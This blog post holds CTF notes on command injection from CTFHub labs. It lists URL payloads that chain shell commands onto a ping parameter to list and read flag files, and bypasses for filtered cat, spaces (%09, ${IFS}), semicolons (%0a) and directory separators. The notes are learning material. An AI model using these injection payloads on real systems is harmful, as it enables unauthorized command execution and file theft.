首页 > 其他分享 >CTF之RCE笔记

CTF之RCE笔记

时间:2024-02-26 21:22:07浏览次数:25  
标签:127.0 0.1 ip flag 笔记 cat CTF RCE php

https://www.ctfhub.com/#/skilltree

命令注入
命令注入,查看当前文件夹结构 ?ip=127.0.0.1;ls

查看php文件内容 ?ip=127.0.0.1;cat 11001571914029.php

提交flag,成功破解

过滤cat
命令注入,查看当前文件夹结构 ?ip=127.0.0.1;ls

使用cat尝试读取php文件 ?ip=127.0.0.1;cat flag_178872710619471.php

显示失败,使用more替换cat再次尝试 ?ip=127.0.0.1;more flag_178872710619471.php

提交flag,成功破解

过滤空格
命令注入,查看当前文件夹结构 ?ip=127.0.0.1;ls

直接使用cat浏览php文件 ?ip=127.0.0.1;cat flag_30181147756989.php

读取失败,使用%09替换空格再次尝试 ?ip=127.0.0.1;cat%09flag_30181147756989.php

提交flag,成功破解

ps:常用的空格替换方法

过滤目录分隔符
命令注入,查看当前文件夹结构 ?ip=127.0.0.1;ls

命令注入,查看flag文件夹结构 ?ip=127.0.0.1;ls flag_is_here

先使用cd切换到flag目录,在使用cat查看php文件 ?ip=127.0.0.1;cd flag_is_here;cat flag_310062566722497.php

提交flag,成功破解

过滤运算符
命令注入,查看当前文件夹结构 ?ip=127.0.0.1;ls

命令注入,查看php文件 ?ip=127.0.0.1;cat flag_8111289615075.php

提交flag,成功破解

综合过滤练习
直接ping127.0.0.1,可以回显 ?ip=127.0.0.1

加上分号 ; 再次ping127.0.0.1,回显异常(说明过滤了分号;) ?ip=127.0.0.1;

使用%0a替换分号再次尝试,可以回显(则可以使用%0a替换分号) ?ip=127.0.0.1%0a

命令注入,查看当前文件夹内容 ?ip=127.0.0.1%0als

使用${IFS}代替空格,使用正则代替flag ?ip=127.0.0.1%0als${IFS}f_is_here

先切换到flag_is_here目录,再more查看php文件 ?ip=127.0.0.1%0acd${IFS}f
_is_here%0amore${IFS}f*_326413011625021.php

提交flag,成功破解题目

标签:127.0,0.1,ip,flag,笔记,cat,CTF,RCE,php
From: https://www.cnblogs.com/Snail-yellow/p/18035119

相关文章

  • Educational Codeforces Round 162 (Rated for Div. 2)
    Preface开学了没时间组队训练就抽空把之前欠下的CF补一补这场当时玩《拔作岛》上头了忘记有比赛了,等想起来的时候已经快结束了就没现场打赛后补题发现A~E都很简单,F的话一个地方没太想清看了题解才会A.MovingChips签到,找一个极小的且包含了所有\(1\)的区间,这个区间中\(0\)......
  • 【学习笔记】树型DP学习笔记
    学习笔记索引省流:被吊打了自己开的一个坑,死也要填完它。希望我随手写下的笔记对您的学习有所帮助(也不太可能)。更改日志2024/01/08:开坑,写了树的直径和换根DP,写不动了(((2024/01/08晚上:更新了最小点覆盖和最大独立集,看来精神还可以,顶着明天做手术的风险2024/01/09:修改错误+增补......
  • 【学习笔记】倍增ST表、LCA学习笔记
    学习笔记索引众所周知,scy5赛时在P10059Choose写了个滑动窗口骗\(40\)分,但是狂WA不止,丢掉了\(rk155\),于是就有了下面这两张口吐芬芳的图:听说这题可以用ST表做,但他不会,于是他就来学倍增乐。省流:被吊打了更改日志2024/01/16:开坑。倍增原理设做一件事有\(n\)个步骤。......
  • 【学习笔记】分块学习笔记
    学习笔记索引分块经常听别人提起,我也学一下。正片分块就是将一个数列分成很多块,然后每块单独操作,最后的结果放到原数列里。分块的题目类型经常是区间中修改和查询。这里,一个长度为\(n\)的数列最多分成\(\sqrtn\)个块。先来看例题吧。例题P2357守墓人题目背景在一......
  • Codeforces 1451F Nullify The Matrix
    因为保证了这个路径必须是向下和向右,就可以考虑每一条\(i+j=x\)的斜线上的点,因为一条路径经过的点对应的\(i+j\)一定是每次\(+1\)的。考虑到因为对于同一条直线,每个点是独立的,因为一条路径至多经过这条直线上的一个点。于是可以考虑用\(\text{Nim}\)的思想把这条......
  • CF1923 Educational Codeforces Round 162 (Rated for Div. 2)
    C.FindB给出一个数组A,对于q个询问,每个询问给出[l,r],对于A的子数组[l,r],问是否存在一个相同大小的数组B,使得两个数组的和相同,且任意相同下标的元素不同?Solution:A中任意一个大于1的元素,可以把他变成1,多余的那部分给到其他位置的元素上(如最后一个)对于等于1的元素,把......
  • CF1932 Codeforces Round 927 (Div. 3)
    E.FinalCountdown我愿称之为今年最傻逼的一次,思路很快想出来了,但是实现一直搞不对观察发现答案是n的所有前i位数相加(如12345,那么ans=12345+1234+123+12+1)要证明的话就是按照题目的Note那样算,(以12345为例,ans=(12345-1234-123-12-1)+21234+2123+212+21)然后傻逼的事情......
  • 【Django开发】0到1开发美多shop项目:用户登录模块开发。全md文档笔记(附代码 文档)
    本系列文章md笔记(已分享)主要讨论django商城项目相关知识。项目利用Django框架开发一套前后端不分离的商城项目(4.0版本)含代码和文档。功能包括前后端不分离,方便SEO。采用Django+Jinja2模板引擎+Vue.js实现前后端逻辑,Nginx服务器(反向代理)Nginx服务器(静态首页、商品详情页、uwsg......
  • Vue学习笔记16--监视属性watch + 深度监视 + 监视简写
    监视属性watch示例一:<!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"><metaname="viewport"content="width=device-width,initial-scale=1.0"><title>计算属性</title&......
  • 标记永久化【学习笔记】
    众所周知,线段树最重要的操作之一便是标记下传。但在一些情况下,我们不能进行标记的下传(可能是正确性的问题、或者是复杂度的问题)正确性问题:比如带修的可持久化线段树中,如果标记下传,会影响之前的版本。复杂度问题:比如树套树中,push_up操作的复杂度会直接炸掉。因此,就产生了标记永......